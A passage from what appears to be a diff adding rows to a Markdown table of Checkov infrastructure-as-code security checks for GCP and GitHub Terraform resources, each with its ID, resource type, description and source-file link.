Memorystore for Redis uses intransit encryption | Terraform | [MemorystoreForRedisInTransitEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/MemorystoreForRedisInTransitEncryption.py) | +| 1718 | CKV_GCP_98 | resource | google_dataproc_cluster_iam_binding | Ensure that Dataproc clusters are not anonymously or publicly accessible | Terraform | [DataprocPrivateCluster.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataprocPrivateCluster.py) | +| 1719 | CKV_GCP_98 | resource | google_dataproc_cluster_iam_member | Ensure that Dataproc clusters are not anonymously or publicly accessible | Terraform | [DataprocPrivateCluster.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataprocPrivateCluster.py) | +| 1720 | CKV_GCP_99 | resource | google_pubsub_topic_iam_binding | Ensure that Pub/Sub Topics are not anonymously or publicly accessible | Terraform | [PubSubPrivateTopic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/PubSubPrivateTopic.py) | +| 1721 | CKV_GCP_99 | resource | google_pubsub_topic_iam_member | Ensure that Pub/Sub Topics are not anonymously or publicly accessible | Terraform | [PubSubPrivateTopic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/PubSubPrivateTopic.py) | +| 1722 | CKV_GCP_100 | resource | google_bigquery_table_iam_binding | Ensure that BigQuery Tables are not anonymously or publicly accessible | Terraform | [BigQueryPrivateTable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/BigQueryPrivateTable.py) | +| 1723 | CKV_GCP_100 | resource | google_bigquery_table_iam_member | Ensure that BigQuery Tables are not anonymously or publicly accessible | Terraform | 
[BigQueryPrivateTable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/BigQueryPrivateTable.py) | +| 1724 | CKV_GCP_101 | resource | google_artifact_registry_repository_iam_binding | Ensure that Artifact Registry repositories are not anonymously or publicly accessible | Terraform | [ArtifactRegistryPrivateRepo.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/ArtifactRegistryPrivateRepo.py) | +| 1725 | CKV_GCP_101 | resource | google_artifact_registry_repository_iam_member | Ensure that Artifact Registry repositories are not anonymously or publicly accessible | Terraform | [ArtifactRegistryPrivateRepo.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/ArtifactRegistryPrivateRepo.py) | +| 1726 | CKV_GCP_102 | resource | google_cloud_run_service_iam_binding | Ensure that GCP Cloud Run services are not anonymously or publicly accessible | Terraform | [GCPCloudRunPrivateService.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GCPCloudRunPrivateService.py) | +| 1727 | CKV_GCP_102 | resource | google_cloud_run_service_iam_member | Ensure that GCP Cloud Run services are not anonymously or publicly accessible | Terraform | [GCPCloudRunPrivateService.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GCPCloudRunPrivateService.py) | +| 1728 | CKV_GCP_103 | resource | google_dataproc_cluster | Ensure Dataproc Clusters do not have public IPs | Terraform | [DataprocPublicIpCluster.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataprocPublicIpCluster.py) | +| 1729 | CKV_GCP_104 | resource | google_data_fusion_instance | Ensure Datafusion has stack driver logging enabled | Terraform | 
[DataFusionStackdriverLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataFusionStackdriverLogs.py) | +| 1730 | CKV_GCP_105 | resource | google_data_fusion_instance | Ensure Datafusion has stack driver monitoring enabled | Terraform | [DataFusionStackdriverMonitoring.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataFusionStackdriverMonitoring.py) | +| 1731 | CKV_GCP_106 | resource | google_compute_firewall | Ensure Google compute firewall ingress does not allow unrestricted http port 80 access | Terraform | [GoogleComputeFirewallUnrestrictedIngress80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress80.py) | +| 1732 | CKV_GCP_107 | resource | google_cloudfunctions2_function_iam_binding | Cloud functions should not be public | Terraform | [CloudFunctionsShouldNotBePublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudFunctionsShouldNotBePublic.py) | +| 1733 | CKV_GCP_107 | resource | google_cloudfunctions2_function_iam_member | Cloud functions should not be public | Terraform | [CloudFunctionsShouldNotBePublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudFunctionsShouldNotBePublic.py) | +| 1734 | CKV_GCP_107 | resource | google_cloudfunctions_function_iam_binding | Cloud functions should not be public | Terraform | [CloudFunctionsShouldNotBePublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudFunctionsShouldNotBePublic.py) | +| 1735 | CKV_GCP_107 | resource | google_cloudfunctions_function_iam_member | Cloud functions should not be public | Terraform | [CloudFunctionsShouldNotBePublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudFunctionsShouldNotBePublic.py) | +| 1736 | CKV_GCP_108 | 
resource | google_sql_database_instance | Ensure hostnames are logged for GCP PostgreSQL databases | Terraform | [GoogleCloudPostgreSqlLogHostname.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogHostname.py) | +| 1737 | CKV_GCP_109 | resource | google_sql_database_instance | Ensure the GCP PostgreSQL database log levels are set to ERROR or lower | Terraform | [GoogleCloudPostgreSqlLogMinErrorStatement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogMinErrorStatement.py) | +| 1738 | CKV_GCP_110 | resource | google_sql_database_instance | Ensure pgAudit is enabled for your GCP PostgreSQL database | Terraform | [GoogleCloudPostgreSqlEnablePgaudit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlEnablePgaudit.py) | +| 1739 | CKV_GCP_111 | resource | google_sql_database_instance | Ensure GCP PostgreSQL logs SQL statements | Terraform | [GoogleCloudPostgreSqlLogStatement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogStatement.py) | +| 1740 | CKV_GCP_112 | resource | google_kms_crypto_key_iam_binding | Esnure KMS policy should not allow public access | Terraform | [GoogleKMSKeyIsPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleKMSKeyIsPublic.py) | +| 1741 | CKV_GCP_112 | resource | google_kms_crypto_key_iam_member | Esnure KMS policy should not allow public access | Terraform | [GoogleKMSKeyIsPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleKMSKeyIsPublic.py) | +| 1742 | CKV_GCP_112 | resource | google_kms_crypto_key_iam_policy | Esnure KMS policy should not allow public access | Terraform | 
[GoogleKMSKeyIsPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleKMSKeyIsPublic.py) | +| 1743 | CKV_GCP_113 | data | google_iam_policy | Ensure IAM policy should not define public access | Terraform | [GooglePolicyIsPrivate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/gcp/GooglePolicyIsPrivate.py) | +| 1744 | CKV_GCP_114 | resource | google_storage_bucket | Ensure public access prevention is enforced on Cloud Storage bucket | Terraform | [GoogleStoragePublicAccessPrevention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleStoragePublicAccessPrevention.py) | +| 1745 | CKV_GCP_115 | resource | google_organization_iam_binding | Ensure basic roles are not used at organization level. | Terraform | [GoogleOrgBasicRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleOrgBasicRole.py) | +| 1746 | CKV_GCP_115 | resource | google_organization_iam_member | Ensure basic roles are not used at organization level. | Terraform | [GoogleOrgBasicRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleOrgBasicRole.py) | +| 1747 | CKV_GCP_116 | resource | google_folder_iam_binding | Ensure basic roles are not used at folder level. | Terraform | [GoogleFolderBasicRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleFolderBasicRole.py) | +| 1748 | CKV_GCP_116 | resource | google_folder_iam_member | Ensure basic roles are not used at folder level. | Terraform | [GoogleFolderBasicRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleFolderBasicRole.py) | +| 1749 | CKV_GCP_117 | resource | google_project_iam_binding | Ensure basic roles are not used at project level. 
| Terraform | [GoogleProjectBasicRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectBasicRole.py) | +| 1750 | CKV_GCP_117 | resource | google_project_iam_member | Ensure basic roles are not used at project level. | Terraform | [GoogleProjectBasicRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectBasicRole.py) | +| 1751 | CKV_GCP_118 | resource | google_iam_workload_identity_pool_provider | Ensure IAM workload identity pool provider is restricted | Terraform | [GoogleIAMWorkloadIdentityConditional.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleIAMWorkloadIdentityConditional.py) | +| 1752 | CKV_GCP_119 | resource | google_spanner_database | Ensure Spanner Database has deletion protection enabled | Terraform | [SpannerDatabaseDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/SpannerDatabaseDeletionProtection.py) | +| 1753 | CKV_GCP_120 | resource | google_spanner_database | Ensure Spanner Database has drop protection enabled | Terraform | [SpannerDatabaseDropProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/SpannerDatabaseDropProtection.py) | +| 1754 | CKV_GCP_121 | resource | google_bigquery_table | Ensure BigQuery tables have deletion protection enabled | Terraform | [BigQueryTableDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/BigQueryTableDeletionProtection.py) | +| 1755 | CKV_GCP_122 | resource | google_bigtable_instance | Ensure Big Table Instances have deletion protection enabled | Terraform | [BigTableInstanceDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/BigTableInstanceDeletionProtection.py) | +| 1756 | CKV_GCP_123 | resource | google_container_cluster | 
GKE Don't Use NodePools in the Cluster configuration | Terraform | [GKEDontUseNodePools.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEDontUseNodePools.py) | +| 1757 | CKV_GCP_124 | resource | google_cloudfunctions2_function | Ensure GCP Cloud Function is not configured with overly permissive Ingress setting | Terraform | [CloudFunctionPermissiveIngress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudFunctionPermissiveIngress.py) | +| 1758 | CKV_GCP_124 | resource | google_cloudfunctions_function | Ensure GCP Cloud Function is not configured with overly permissive Ingress setting | Terraform | [CloudFunctionPermissiveIngress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudFunctionPermissiveIngress.py) | +| 1759 | CKV2_GCP_1 | resource | google_project_default_service_accounts | Ensure GKE clusters are not running using the Compute Engine default service account | Terraform | [GKEClustersAreNotUsingDefaultServiceAccount.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GKEClustersAreNotUsingDefaultServiceAccount.yaml) | +| 1760 | CKV2_GCP_2 | resource | google_compute_network | Ensure legacy networks do not exist for a project | Terraform | [GCPProjectHasNoLegacyNetworks.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPProjectHasNoLegacyNetworks.yaml) | +| 1761 | CKV2_GCP_3 | resource | google_service_account_key | Ensure that there are only GCP-managed service account keys for each service account | Terraform | [ServiceAccountHasGCPmanagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/ServiceAccountHasGCPmanagedKey.yaml) | +| 1762 | CKV2_GCP_4 | resource | google_logging_folder_sink | Ensure that retention policies on log buckets are configured using Bucket Lock | 
Terraform | [GCPLogBucketsConfiguredUsingLock.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPLogBucketsConfiguredUsingLock.yaml) | +| 1763 | CKV2_GCP_4 | resource | google_logging_organization_sink | Ensure that retention policies on log buckets are configured using Bucket Lock | Terraform | [GCPLogBucketsConfiguredUsingLock.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPLogBucketsConfiguredUsingLock.yaml) | +| 1764 | CKV2_GCP_4 | resource | google_logging_project_sink | Ensure that retention policies on log buckets are configured using Bucket Lock | Terraform | [GCPLogBucketsConfiguredUsingLock.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPLogBucketsConfiguredUsingLock.yaml) | +| 1765 | CKV2_GCP_4 | resource | google_storage_bucket | Ensure that retention policies on log buckets are configured using Bucket Lock | Terraform | [GCPLogBucketsConfiguredUsingLock.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPLogBucketsConfiguredUsingLock.yaml) | +| 1766 | CKV2_GCP_5 | resource | google_project | Ensure that Cloud Audit Logging is configured properly across all services and all users from a project | Terraform | [GCPAuditLogsConfiguredForAllServicesAndUsers.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPAuditLogsConfiguredForAllServicesAndUsers.yaml) | +| 1767 | CKV2_GCP_5 | resource | google_project_iam_audit_config | Ensure that Cloud Audit Logging is configured properly across all services and all users from a project | Terraform | [GCPAuditLogsConfiguredForAllServicesAndUsers.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPAuditLogsConfiguredForAllServicesAndUsers.yaml) | +| 1768 | CKV2_GCP_6 | resource | google_kms_crypto_key | Ensure that Cloud 
KMS cryptokeys are not anonymously or publicly accessible | Terraform | [GCPKMSCryptoKeysAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPKMSCryptoKeysAreNotPubliclyAccessible.yaml) | +| 1769 | CKV2_GCP_6 | resource | google_kms_crypto_key_iam_binding | Ensure that Cloud KMS cryptokeys are not anonymously or publicly accessible | Terraform | [GCPKMSCryptoKeysAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPKMSCryptoKeysAreNotPubliclyAccessible.yaml) | +| 1770 | CKV2_GCP_6 | resource | google_kms_crypto_key_iam_member | Ensure that Cloud KMS cryptokeys are not anonymously or publicly accessible | Terraform | [GCPKMSCryptoKeysAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPKMSCryptoKeysAreNotPubliclyAccessible.yaml) | +| 1771 | CKV2_GCP_7 | resource | google_sql_database_instance | Ensure that a MySQL database instance does not allow anyone to connect with administrative privileges | Terraform | [DisableAccessToSqlDBInstanceForRootUsersWithoutPassword.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/DisableAccessToSqlDBInstanceForRootUsersWithoutPassword.yaml) | +| 1772 | CKV2_GCP_7 | resource | google_sql_user | Ensure that a MySQL database instance does not allow anyone to connect with administrative privileges | Terraform | [DisableAccessToSqlDBInstanceForRootUsersWithoutPassword.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/DisableAccessToSqlDBInstanceForRootUsersWithoutPassword.yaml) | +| 1773 | CKV2_GCP_8 | resource | google_kms_key_ring | Ensure that Cloud KMS Key Rings are not anonymously or publicly accessible | Terraform | 
[GCPKMSKeyRingsAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPKMSKeyRingsAreNotPubliclyAccessible.yaml) | +| 1774 | CKV2_GCP_8 | resource | google_kms_key_ring_iam_binding | Ensure that Cloud KMS Key Rings are not anonymously or publicly accessible | Terraform | [GCPKMSKeyRingsAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPKMSKeyRingsAreNotPubliclyAccessible.yaml) | +| 1775 | CKV2_GCP_8 | resource | google_kms_key_ring_iam_member | Ensure that Cloud KMS Key Rings are not anonymously or publicly accessible | Terraform | [GCPKMSKeyRingsAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPKMSKeyRingsAreNotPubliclyAccessible.yaml) | +| 1776 | CKV2_GCP_9 | resource | google_container_registry | Ensure that Container Registry repositories are not anonymously or publicly accessible | Terraform | [GCPContainerRegistryReposAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPContainerRegistryReposAreNotPubliclyAccessible.yaml) | +| 1777 | CKV2_GCP_9 | resource | google_storage_bucket_iam_binding | Ensure that Container Registry repositories are not anonymously or publicly accessible | Terraform | [GCPContainerRegistryReposAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPContainerRegistryReposAreNotPubliclyAccessible.yaml) | +| 1778 | CKV2_GCP_9 | resource | google_storage_bucket_iam_member | Ensure that Container Registry repositories are not anonymously or publicly accessible | Terraform | [GCPContainerRegistryReposAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPContainerRegistryReposAreNotPubliclyAccessible.yaml) | +| 
1779 | CKV2_GCP_10 | resource | google_cloudfunctions_function | Ensure GCP Cloud Function HTTP trigger is secured | Terraform | [CloudFunctionSecureHTTPTrigger.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/CloudFunctionSecureHTTPTrigger.yaml) | +| 1780 | CKV2_GCP_11 | resource | google_project_services | Ensure GCP GCR Container Vulnerability Scanning is enabled | Terraform | [GCRContainerVulnerabilityScanningEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCRContainerVulnerabilityScanningEnabled.yaml) | +| 1781 | CKV2_GCP_12 | resource | google_compute_firewall | Ensure GCP compute firewall ingress does not allow unrestricted access to all ports | Terraform | [GCPComputeFirewallOverlyPermissiveToAllTraffic.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPComputeFirewallOverlyPermissiveToAllTraffic.yaml) | +| 1782 | CKV2_GCP_13 | resource | google_sql_database_instance | Ensure PostgreSQL database flag 'log_duration' is set to 'on' | Terraform | [GCPPostgreSQLDatabaseFlaglog_durationIsSetToON.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPPostgreSQLDatabaseFlaglog_durationIsSetToON.yaml) | +| 1783 | CKV2_GCP_14 | resource | google_sql_database_instance | Ensure PostgreSQL database flag 'log_executor_stats' is set to 'off' | Terraform | [GCPPostgreSQLDatabaseFlaglog_executor_statsIsSetToOFF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPPostgreSQLDatabaseFlaglog_executor_statsIsSetToOFF.yaml) | +| 1784 | CKV2_GCP_15 | resource | google_sql_database_instance | Ensure PostgreSQL database flag 'log_parser_stats' is set to 'off' | Terraform | 
[GCPPostgreSQLDatabaseFlaglog_parser_statsIsSetToOFF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPPostgreSQLDatabaseFlaglog_parser_statsIsSetToOFF.yaml) | +| 1785 | CKV2_GCP_16 | resource | google_sql_database_instance | Ensure PostgreSQL database flag 'log_planner_stats' is set to 'off' | Terraform | [GCPPostgreSQLDatabaseFlaglog_planner_statsIsSetToOFF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPPostgreSQLDatabaseFlaglog_planner_statsIsSetToOFF.yaml) | +| 1786 | CKV2_GCP_17 | resource | google_sql_database_instance | Ensure PostgreSQL database flag 'log_statement_stats' is set to 'off' | Terraform | [GCPPostgreSQLDatabaseFlaglog_statement_statsIsSetToOFF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPPostgreSQLDatabaseFlaglog_statement_statsIsSetToOFF.yaml) | +| 1787 | CKV2_GCP_18 | resource | google_compute_network | Ensure GCP network defines a firewall and does not use the default firewall | Terraform | [GCPNetworkDoesNotUseDefaultFirewall.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPNetworkDoesNotUseDefaultFirewall.yaml) | +| 1788 | CKV2_GCP_19 | resource | google_container_cluster | Ensure GCP Kubernetes engine clusters have 'alpha cluster' feature disabled | Terraform | [GCPdisableAlphaClusterFeatureInKubernetesEngineClusters.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPdisableAlphaClusterFeatureInKubernetesEngineClusters.yaml) | +| 1789 | CKV2_GCP_20 | resource | google_sql_database_instance | Ensure MySQL DB instance has point-in-time recovery backup configured | Terraform | 
[GCPMySQLdbInstancePoint_In_TimeRecoveryBackupIsEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPMySQLdbInstancePoint_In_TimeRecoveryBackupIsEnabled.yaml) | +| 1790 | CKV2_GCP_21 | resource | google_notebooks_instance | Ensure Vertex AI instance disks are encrypted with a Customer Managed Key (CMK) | Terraform | [GCPVertexInstanceEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexInstanceEncryptedWithCMK.yaml) | +| 1791 | CKV2_GCP_22 | resource | google_document_ai_processor | Ensure Document AI Processors are encrypted with a Customer Managed Key (CMK) | Terraform | [GCPDocumentAIProcessorEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPDocumentAIProcessorEncryptedWithCMK.yaml) | +| 1792 | CKV2_GCP_23 | resource | google_document_ai_warehouse_location | Ensure Document AI Warehouse Location is configured to use a Customer Managed Key (CMK) | Terraform | [GCPDocumentAIWarehouseLocationEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPDocumentAIWarehouseLocationEncryptedWithCMK.yaml) | +| 1793 | CKV2_GCP_24 | resource | google_vertex_ai_endpoint | Ensure Vertex AI endpoint uses a Customer Managed Key (CMK) | Terraform | [GCPVertexAIEndpointEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexAIEndpointEncryptedWithCMK.yaml) | +| 1794 | CKV2_GCP_25 | resource | google_vertex_ai_featurestore | Ensure Vertex AI featurestore uses a Customer Managed Key (CMK) | Terraform | [GCPVertexAIFeaturestoreEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexAIFeaturestoreEncryptedWithCMK.yaml) | +| 1795 | CKV2_GCP_26 | resource | google_vertex_ai_tensorboard | Ensure Vertex 
AI tensorboard uses a Customer Managed Key (CMK) | Terraform | [GCPVertexAITensorboardEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexAITensorboardEncryptedWithCMK.yaml) | +| 1796 | CKV2_GCP_27 | resource | google_workbench_instance | Ensure Vertex AI workbench instance disks are encrypted with a Customer Managed Key (CMK) | Terraform | [GCPVertexWorkbenchInstanceEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexWorkbenchInstanceEncryptedWithCMK.yaml) | +| 1797 | CKV2_GCP_28 | resource | google_workbench_instance | Ensure Vertex AI workbench instances are private | Terraform | [GCPVertexWorkbenchInstanceNoPublicIp.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexWorkbenchInstanceNoPublicIp.yaml) | +| 1798 | CKV2_GCP_29 | resource | google_dialogflow_agent | Ensure logging is enabled for Dialogflow agents | Terraform | [GCPDialogFlowAgentLoggingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPDialogFlowAgentLoggingEnabled.yaml) | +| 1799 | CKV2_GCP_30 | resource | google_dialogflow_cx_agent | Ensure logging is enabled for Dialogflow CX agents | Terraform | [GCPDialogFlowCxAgentLoggingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPDialogFlowCxAgentLoggingEnabled.yaml) | +| 1800 | CKV2_GCP_31 | resource | google_dialogflow_cx_webhook | Ensure logging is enabled for Dialogflow CX webhooks | Terraform | [GCPDialogFlowCxWebhookLoggingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPDialogFlowCxWebhookLoggingEnabled.yaml) | +| 1801 | CKV2_GCP_32 | resource | google_tpu_v2_vm | Ensure TPU v2 is private | Terraform | 
[GCPTpuV2VmPrivateEndpoint.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPTpuV2VmPrivateEndpoint.yaml) |
+| 1802 | CKV2_GCP_33 | resource | google_vertex_ai_endpoint | Ensure Vertex AI endpoint is private | Terraform | [GCPVertexAIPrivateEndpoint.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexAIPrivateEndpoint.yaml) |
+| 1803 | CKV2_GCP_34 | resource | google_vertex_ai_index_endpoint | Ensure Vertex AI index endpoint is private | Terraform | [GCPVertexAIPrivateIndexEndpoint.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexAIPrivateIndexEndpoint.yaml) |
+| 1804 | CKV2_GCP_35 | resource | google_notebooks_runtime | Ensure Vertex AI runtime is encrypted with a Customer Managed Key (CMK) | Terraform | [GCPVertexRuntimeEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexRuntimeEncryptedWithCMK.yaml) |
+| 1805 | CKV2_GCP_36 | resource | google_notebooks_runtime | Ensure Vertex AI runtime is private | Terraform | [GCPVertexRuntimePrivate.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexRuntimePrivate.yaml) |
+| 1806 | CKV_GIT_1 | resource | github_repository | Ensure GitHub repository is Private | Terraform | [PrivateRepo.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/PrivateRepo.py) |
+| 1807 | CKV_GIT_2 | resource | github_repository_webhook | Ensure GitHub repository webhooks are using HTTPS | Terraform | [WebhookInsecureSsl.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/WebhookInsecureSsl.py) |
+| 1808 | CKV_GIT_3 | resource | github_repository | Ensure GitHub repository has vulnerability alerts enabled | Terraform | [RepositoryEnableVulnerabilityAlerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/RepositoryEnableVulnerabilityAlerts.py) |
+| 1809 | CKV_GIT_4 | resource | github_actions_environment_secret | Ensure GitHub Actions secrets are encrypted | Terraform | [SecretsEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/SecretsEncrypted.py) |
+| 1810 | CKV_GIT_4 | resource | github_actions_organization_secret | Ensure GitHub Actions secrets are encrypted | Terraform | [SecretsEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/SecretsEncrypted.py) |
+| 1811 | CKV_GIT_4 | resource | github_actions_secret | Ensure GitHub Actions secrets are encrypted | Terraform | [SecretsEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/SecretsEncrypted.py) |
+| 1812 | CKV_GIT_5 | resource | github_branch_protection | GitHub pull requests should require at least 2 approvals | Terraform | [BranchProtectionReviewNumTwo.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/BranchProtectionReviewNumTwo.py) |
+| 1813 | CKV_GIT_5 | resource | github_branch_protection_v3 | GitHub pull requests should require at least 2 approvals | Terraform | [BranchProtectionReviewNumTwo.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/BranchProtectionReviewNumTwo.py) |
+| 1814 | CKV_GIT_6 | resource | github_branch_protection | Ensure GitHub branch protection rules requires signed commits | Terraform | [BranchProtectionRequireSignedCommits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/BranchProtectionRequireSignedCommits.py) |
